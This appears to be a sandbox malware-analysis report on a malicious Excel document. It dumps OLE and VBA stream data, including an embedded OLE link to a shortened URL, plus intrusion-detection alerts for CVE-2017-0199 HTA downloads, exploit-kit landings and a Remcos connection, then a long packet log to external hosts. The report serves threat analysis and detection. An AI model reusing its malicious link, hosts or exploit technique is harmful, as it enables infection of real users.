Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                      VBA File Name: Sheet3.cls, Stream Size: 977
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                      VBA File Name:Sheet3.cls
                                                      Stream Size:977
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 cf 24 ae f5 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      VBA Code
                                                      Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                      VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                      VBA File Name:ThisWorkbook.cls
                                                      Stream Size:985
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                      Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 cf 24 9e 96 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      VBA Code
                                                      Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                      Streams

                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                      General
                                                      Stream Path:\x1CompObj
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:114
                                                      Entropy:4.25248375192737
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                      General
                                                      Stream Path:\x5DocumentSummaryInformation
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:244
                                                      Entropy:2.889430592781307
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                      General
                                                      Stream Path:\x5SummaryInformation
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:200
                                                      Entropy:3.2403503175049813
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . . E . . . . . . . . .
                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                      Stream Path: MBD0032CD05/\x1CompObj, File Type: data, Stream Size: 99
                                                      General
                                                      Stream Path:MBD0032CD05/\x1CompObj
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:99
                                                      Entropy:3.631242196770981
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Stream Path: MBD0032CD05/Package, File Type: Microsoft Excel 2007+, Stream Size: 19363
                                                      General
                                                      Stream Path:MBD0032CD05/Package
                                                      CLSID:
                                                      File Type:Microsoft Excel 2007+
                                                      Stream Size:19363
                                                      Entropy:7.65458028132816
                                                      Base64 Encoded:True
                                                      Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                      Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                      Stream Path: MBD0032CD06/\x1Ole, File Type: data, Stream Size: 492
                                                      General
                                                      Stream Path:MBD0032CD06/\x1Ole
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:492
                                                      Entropy:6.046678422301103
                                                      Base64 Encoded:False
                                                      Data ASCII:. . . . . ? & f @ ) . . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . z . h . o . r . t . . . d . e . / . p . i . t . a . s . h . . . . i . m m . K H i " R . S k ) J K A . J w ` 7 Y \\ x M . . . . . \\ g l 7 - g 8 . C . . 1 . ? L . . , < i S : W ] ! 7 h . . . . F v . ; . " o [ . ^ y . ! . 2 J + ~ J I . K s 7 i . . 4 m \\ R X 6 p . @ . * . " . h & i . . . ~ . 8 . . . . . . . . . . . . . . . . . . . b . u . V . F . f . A . 6 . k . t . J . 4 . s . v . p . q . 2 . n . u . j . S
                                                      Data Raw:01 00 00 02 07 fd 3f 26 66 96 40 29 00 00 00 00 00 00 00 00 00 00 00 00 02 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b fe 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 7a 00 68 00 6f 00 72 00 74 00 2e 00 64 00 65 00 2f 00 70 00 69 00 74 00 61 00 73 00 68 00 00 00 a1 00 69 1a e1 6d 6d a8 ce cf a6 d5 4b 48 69 8c f3 22 e2 81 52 07 53 6b 29 4a 4b 41 af 1b f5 84
                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 530977
                                                      General
                                                      Stream Path:Workbook
                                                      CLSID:
                                                      File Type:Applesoft BASIC program data, first line number 16
                                                      Stream Size:530977
                                                      Entropy:7.999355654910445
                                                      Base64 Encoded:True
                                                      Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . f > q W . . . . / s . , : Y . . . B . X . ] ? % * W . . . . . . . . . . . \\ . p . . / X } S } ( _ k . . f w . [ k K 0 | . \\ . { . Y < 2 I . ? . E . y 0 x @ . . Q . ^ . . . @ o . . $ . Y Y . > $ V . . B . . . . a . . . . . . . . = . . . o . . { . . . . ; l . . 1 , ' . . . @ V . . . . 5 . . . . . . . . . . 3 . . . . . . . . = . . . 5 . p 7 + . > . / P . . h @ . . . S b . . . . " . . . . . . . . | p . . . p . . . . 1 . . . . C ! . . A z < . ( . f \\ ( N .
                                                      Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c8 66 c0 b1 3e 9e 71 84 57 de 9f 0a dd 88 b8 2e 2f 8b fd bc 73 12 2c 3a 59 0b ce 91 f0 9c c4 8c 42 f7 0b 58 8c 82 1c 9c d8 5d 95 9f 3f 25 2a 57 e1 00 02 00 b0 04 c1 00 02 00 1d b6 e2 00 00 00 5c 00 70 00 0b 91 2f f3 58 7d 81 8f 53 bb 7d af fd 28 5f b5 6b fc cc 12 1c e0 ab f7 66 dc 77 fe 1e a4
                                                      Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 533
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/PROJECT
                                                      CLSID:
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Stream Size:533
                                                      Entropy:5.247618732791725
                                                      Base64 Encoded:True
                                                      Data ASCII:I D = " { 6 3 B 7 5 A 4 7 - 8 F 4 8 - 4 4 C 4 - B 0 9 9 - 2 1 C 4 3 3 5 F 7 D 1 E } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 7 E 5 2 F F 2 D 1 0 E 3 4 1 2 3
                                                      Data Raw:49 44 3d 22 7b 36 33 42 37 35 41 34 37 2d 38 46 34 38 2d 34 34 43 34 2d 42 30 39 39 2d 32 31 43 34 33 33 35 46 37 44 31 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                                                      Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:104
                                                      Entropy:3.0488640812019017
                                                      Base64 Encoded:False
                                                      Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                                                      Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                                                      Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:2644
                                                      Entropy:4.008029808248709
                                                      Base64 Encoded:False
                                                      Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                                                      Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                                                      Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553
                                                      General
                                                      Stream Path:_VBA_PROJECT_CUR/VBA/dir
                                                      CLSID:
                                                      File Type:data
                                                      Stream Size:553
                                                      Entropy:6.382644741582946
                                                      Base64 Encoded:True
                                                      Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . 8 s h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
                                                      Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 38 73 df 68 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

                                                      Network Behavior

                                                      Suricata IDS Alerts

                                                      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
                                                      2024-08-28T06:56:30.438197+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14916680192.168.2.22192.3.193.155
                                                      2024-08-28T06:56:30.438199+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)18049166192.3.193.155192.168.2.22
                                                      2024-08-28T06:56:28.368449+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14916480192.168.2.22192.3.193.155
                                                      2024-08-28T06:56:50.218487+0200TCP2024449ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl14917580192.168.2.22192.3.193.155
                                                      2024-08-28T06:57:02.959463+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image144349176207.241.232.154192.168.2.22
                                                      2024-08-28T06:56:44.497830+0200TCP2020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M118049169192.3.193.155192.168.2.22
                                                      2024-08-28T06:56:44.497830+0200TCP2020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M118049169192.3.193.155192.168.2.22
                                                      2024-08-28T06:56:46.416632+0200TCP2036594ET JA3 Hash - Remcos 3.x/4.x TLS Connection14917014645192.168.2.22192.3.64.135
                                                      2024-08-28T06:56:47.844263+0200TCP2803304ETPRO MALWARE Common Downloader Header Pattern HCa34917280192.168.2.22178.237.33.50
                                                      2024-08-28T06:56:28.368474+0200TCP2024197ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)18049164192.3.193.155192.168.2.22
                                                      2024-08-28T06:57:03.728683+0200TCP2020423ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M118049177192.3.193.155192.168.2.22
                                                      2024-08-28T06:57:03.728683+0200TCP2020425ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M118049177192.3.193.155192.168.2.22
                                                      2024-08-28T06:56:43.690731+0200TCP2049038ET MALWARE Malicious Base64 Encoded Payload In Image144349168207.241.232.154192.168.2.22

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Aug 28, 2024 06:56:26.875268936 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:26.875298023 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:26.875360012 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:26.881853104 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:26.881865025 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.558701038 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.558856964 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.564241886 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.564249992 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.564629078 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.564686060 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.662404060 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.704500914 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.863586903 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.863703966 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.863717079 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.863778114 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.864793062 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.864833117 CEST4434916388.99.66.38192.168.2.22
                                                      Aug 28, 2024 06:56:27.864903927 CEST49163443192.168.2.2288.99.66.38
                                                      Aug 28, 2024 06:56:27.869781017 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:27.874687910 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:27.874747992 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:27.874830961 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:27.879740953 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368331909 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368351936 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368361950 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368374109 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368386030 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368396044 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368407965 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368448973 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.368474007 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368474007 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.368493080 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368504047 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.368513107 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.368530989 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.368540049 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.373351097 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.373370886 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.373382092 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.373409033 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.373425961 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.399677992 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.458889961 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.458934069 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.458945990 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.458962917 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.458964109 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.458976030 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.458976984 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459002018 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.459009886 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459011078 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.459023952 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459048033 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.459059000 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.459752083 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459793091 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.459815979 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459827900 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459862947 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.459954977 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459966898 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.459994078 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.460010052 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.460597038 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.460608006 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.460618019 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.460652113 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.460678101 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.460691929 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.460728884 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.460728884 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.460728884 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.461463928 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.461483002 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.461493969 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.461514950 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.461536884 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.461584091 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.461622000 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.461632967 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.461668015 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.461704016 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.462281942 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.462316036 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.463871002 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.463922024 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.464529037 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.464569092 CEST4916480192.168.2.22192.3.193.155
                                                      Aug 28, 2024 06:56:28.552526951 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552546024 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552557945 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552570105 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552582026 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552593946 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552606106 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552618980 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552629948 CEST8049164192.3.193.155192.168.2.22
                                                      Aug 28, 2024 06:56:28.552639961 CEST4916480192.168.2.22192.3.193.155
